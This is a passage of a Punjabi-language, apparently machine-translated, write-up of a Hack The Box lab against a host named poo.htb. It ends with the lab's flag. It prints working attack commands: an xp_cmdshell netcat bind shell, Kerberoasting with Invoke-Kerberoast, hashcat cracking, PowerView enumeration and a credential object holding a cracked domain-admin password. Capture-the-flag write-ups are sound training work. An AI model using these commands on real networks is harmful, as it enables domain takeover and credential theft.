ਆਉ ਹੁਣ ਪ੍ਰੋਗਰਾਮ ਨੂੰ ਸਰਵਰ ਤੇ ਅਪਲੋਡ ਕਰੀਏ ਨੈੱਟਕੈਟ, ਜਿਸ ਨਾਲ ਅਸੀਂ ਇੱਕ ਸਥਿਰ ਬੰਨ੍ਹ ਸ਼ੈੱਲ, ਅਤੇ ਸਕ੍ਰਿਪਟ ਬਣਾਵਾਂਗੇ Kerberoast ਨੂੰ ਬੁਲਾਓ, ਜਿਸ ਨਾਲ ਅਸੀਂ ਕਰਬਰੋਸਟਿੰਗ ਹਮਲਾ ਕਰਾਂਗੇ।

ਹੁਣ, MSSQL ਰਾਹੀਂ, ਅਸੀਂ ਲਿਸਨਰ ਨੂੰ ਲਾਂਚ ਕਰਦੇ ਹਾਂ।

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

ਅਤੇ ਅਸੀਂ ਆਪਣੀ ਪ੍ਰੌਕਸੀ ਰਾਹੀਂ ਜੁੜਦੇ ਹਾਂ।

proxychains rlwrap nc poo.htb 4321

ਅਤੇ ਆਉ ਹੈਸ਼ ਪ੍ਰਾਪਤ ਕਰੀਏ.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

ਅੱਗੇ, ਤੁਹਾਨੂੰ ਇਹਨਾਂ ਹੈਸ਼ਾਂ ਉੱਤੇ ਦੁਹਰਾਉਣ ਦੀ ਲੋੜ ਹੈ। ਕਿਉਂਕਿ rockyou ਕੋਲ ਪਾਸਵਰਡ ਡੇਟਾ ਡਿਕਸ਼ਨਰੀ ਨਹੀਂ ਹੈ, ਮੈਂ Seclists ਵਿੱਚ ਪ੍ਰਦਾਨ ਕੀਤੇ ਸਾਰੇ ਪਾਸਵਰਡ ਸ਼ਬਦਕੋਸ਼ਾਂ ਦੀ ਵਰਤੋਂ ਕੀਤੀ ਹੈ। ਗਣਨਾ ਲਈ ਅਸੀਂ ਹੈਸ਼ਕੈਟ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਾਂ।

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

ਅਤੇ ਅਸੀਂ ਦੋਵੇਂ ਪਾਸਵਰਡ ਲੱਭਦੇ ਹਾਂ, ਪਹਿਲਾ ਡੱਚ_passwordlist.txt ਡਿਕਸ਼ਨਰੀ ਵਿੱਚ, ਅਤੇ ਦੂਜਾ Keyboard-Combinations.txt ਵਿੱਚ।

ਅਤੇ ਇਸ ਲਈ ਸਾਡੇ ਕੋਲ ਤਿੰਨ ਉਪਭੋਗਤਾ ਹਨ, ਅਸੀਂ ਡੋਮੇਨ ਕੰਟਰੋਲਰ ਤੇ ਜਾਂਦੇ ਹਾਂ. ਪਹਿਲਾਂ ਉਸ ਦਾ ਪਤਾ ਲਉ।

ਬਹੁਤ ਵਧੀਆ, ਅਸੀਂ ਡੋਮੇਨ ਕੰਟਰੋਲਰ ਦਾ IP ਪਤਾ ਸਿੱਖਿਆ ਹੈ। ਆਉ ਡੋਮੇਨ ਦੇ ਸਾਰੇ ਉਪਭੋਗਤਾਵਾਂ ਦਾ ਪਤਾ ਲਗਾਓ, ਨਾਲ ਹੀ ਉਹਨਾਂ ਵਿੱਚੋਂ ਕੌਣ ਇੱਕ ਪ੍ਰਸ਼ਾਸਕ ਹੈ। ਜਾਣਕਾਰੀ ਪ੍ਰਾਪਤ ਕਰਨ ਲਈ ਸਕ੍ਰਿਪਟ ਨੂੰ ਡਾਊਨਲੋਡ ਕਰਨ ਲਈ PowerView.ps1. ਫਿਰ ਅਸੀਂ -s ਪੈਰਾਮੀਟਰ ਵਿੱਚ ਸਕ੍ਰਿਪਟ ਨਾਲ ਡਾਇਰੈਕਟਰੀ ਨੂੰ ਨਿਰਧਾਰਿਤ ਕਰਦੇ ਹੋਏ, evil-winrm ਦੀ ਵਰਤੋਂ ਕਰਕੇ ਜੁੜਾਂਗੇ। ਅਤੇ ਫਿਰ ਪਾਵਰਵਿਊ ਸਕ੍ਰਿਪਟ ਨੂੰ ਲੋਡ ਕਰੋ।

ਹੁਣ ਸਾਡੇ ਕੋਲ ਇਸਦੇ ਸਾਰੇ ਫੰਕਸ਼ਨਾਂ ਤੱਕ ਪਹੁੰਚ ਹੈ। p00_adm ਉਪਭੋਗਤਾ ਇੱਕ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਪ੍ਰਾਪਤ ਉਪਭੋਗਤਾ ਦੀ ਤਰ੍ਹਾਂ ਦਿਖਦਾ ਹੈ, ਇਸਲਈ ਅਸੀਂ ਇਸਦੇ ਸੰਦਰਭ ਵਿੱਚ ਕੰਮ ਕਰਾਂਗੇ। ਚਲੋ ਇਸ ਉਪਭੋਗਤਾ ਲਈ ਇੱਕ PSC ਕ੍ਰੀਡੈਂਸ਼ੀਅਲ ਆਬਜੈਕਟ ਬਣਾਈਏ।

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

ਹੁਣ ਸਾਰੀਆਂ ਪਾਵਰਸ਼ੇਲ ਕਮਾਂਡਾਂ ਜਿੱਥੇ ਅਸੀਂ ਕ੍ਰੈਡਿਟ ਨਿਰਧਾਰਤ ਕਰਦੇ ਹਾਂ p00_adm ਦੀ ਤਰਫੋਂ ਚਲਾਇਆ ਜਾਵੇਗਾ। ਆਓ ਉਪਭੋਗਤਾਵਾਂ ਦੀ ਇੱਕ ਸੂਚੀ ਅਤੇ AdminCount ਗੁਣ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰੀਏ।

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

ਅਤੇ ਇਸ ਲਈ, ਸਾਡੇ ਉਪਭੋਗਤਾ ਨੂੰ ਅਸਲ ਵਿੱਚ ਵਿਸ਼ੇਸ਼ ਅਧਿਕਾਰ ਪ੍ਰਾਪਤ ਹੈ. ਆਓ ਦੇਖੀਏ ਕਿ ਉਹ ਕਿਹੜੇ ਸਮੂਹਾਂ ਨਾਲ ਸਬੰਧਤ ਹੈ।

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

ਅਸੀਂ ਅੰਤ ਵਿੱਚ ਪੁਸ਼ਟੀ ਕਰਦੇ ਹਾਂ ਕਿ ਉਪਭੋਗਤਾ ਇੱਕ ਡੋਮੇਨ ਪ੍ਰਸ਼ਾਸਕ ਹੈ। ਇਹ ਇਸਨੂੰ ਡੋਮੇਨ ਕੰਟਰੋਲਰ 'ਤੇ ਰਿਮੋਟਲੀ ਲੌਗਇਨ ਕਰਨ ਦਾ ਅਧਿਕਾਰ ਦਿੰਦਾ ਹੈ। ਆਉ ਸਾਡੀ ਸੁਰੰਗ ਦੀ ਵਰਤੋਂ ਕਰਕੇ WinRM ਨਾਲ ਲੌਗਇਨ ਕਰਨ ਦੀ ਕੋਸ਼ਿਸ਼ ਕਰੀਏ। ਮੈਂ ਬੁਰਾਈ-ਵਿਨਰਮ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਸਮੇਂ reGeorg ਦੁਆਰਾ ਜਾਰੀ ਕੀਤੀਆਂ ਗਲਤੀਆਂ ਦੁਆਰਾ ਉਲਝਣ ਵਿੱਚ ਸੀ।

ਫਿਰ ਅਸੀਂ ਇੱਕ ਹੋਰ, ਆਸਾਨ ਵਰਤਦੇ ਹਾਂ, ਸਕ੍ਰਿਪਟ WinRM ਨਾਲ ਜੁੜਨ ਲਈ। ਕਨੈਕਸ਼ਨ ਪੈਰਾਮੀਟਰ ਖੋਲ੍ਹੋ ਅਤੇ ਬਦਲੋ।

ਅਸੀਂ ਜੁੜਨ ਦੀ ਕੋਸ਼ਿਸ਼ ਕਰਦੇ ਹਾਂ, ਅਤੇ ਅਸੀਂ ਸਿਸਟਮ ਵਿੱਚ ਹਾਂ.

ਪਰ ਕੋਈ ਝੰਡਾ ਨਹੀਂ ਹੈ। ਫਿਰ ਉਪਭੋਗਤਾ ਨੂੰ ਦੇਖੋ ਅਤੇ ਡੈਸਕਟਾਪਾਂ ਦੀ ਜਾਂਚ ਕਰੋ.

mr3ks 'ਤੇ ਸਾਨੂੰ ਝੰਡਾ ਮਿਲਦਾ ਹੈ ਅਤੇ ਪ੍ਰਯੋਗਸ਼ਾਲਾ 100% ਮੁਕੰਮਲ ਹੋ ਗਈ ਹੈ।

ਇਹ ਸਭ ਹੈ. ਫੀਡਬੈਕ ਵਜੋਂ, ਟਿੱਪਣੀ ਕਰੋ ਕਿ ਕੀ ਤੁਸੀਂ ਇਸ ਲੇਖ ਤੋਂ ਕੁਝ ਨਵਾਂ ਸਿੱਖਿਆ ਹੈ ਅਤੇ ਕੀ ਇਹ ਤੁਹਾਡੇ ਲਈ ਲਾਭਦਾਇਕ ਸੀ।

'ਤੇ ਤੁਸੀਂ ਸਾਡੇ ਨਾਲ ਜੁੜ ਸਕਦੇ ਹੋ ਤਾਰ. ਉੱਥੇ ਤੁਸੀਂ ਦਿਲਚਸਪ ਸਮੱਗਰੀ, ਵਿਲੀਨ ਕੀਤੇ ਕੋਰਸਾਂ ਦੇ ਨਾਲ-ਨਾਲ ਸੌਫਟਵੇਅਰ ਵੀ ਲੱਭ ਸਕਦੇ ਹੋ। ਆਉ ਇੱਕ ਕਮਿਊਨਿਟੀ ਨੂੰ ਇਕੱਠਾ ਕਰੀਏ ਜਿਸ ਵਿੱਚ ਅਜਿਹੇ ਲੋਕ ਹੋਣਗੇ ਜੋ IT ਦੇ ਬਹੁਤ ਸਾਰੇ ਖੇਤਰਾਂ ਨੂੰ ਸਮਝਦੇ ਹਨ, ਫਿਰ ਅਸੀਂ ਕਿਸੇ ਵੀ IT ਅਤੇ ਸੂਚਨਾ ਸੁਰੱਖਿਆ ਮੁੱਦਿਆਂ 'ਤੇ ਹਮੇਸ਼ਾ ਇੱਕ ਦੂਜੇ ਦੀ ਮਦਦ ਕਰ ਸਕਦੇ ਹਾਂ।

ਸਰੋਤ: www.habr.com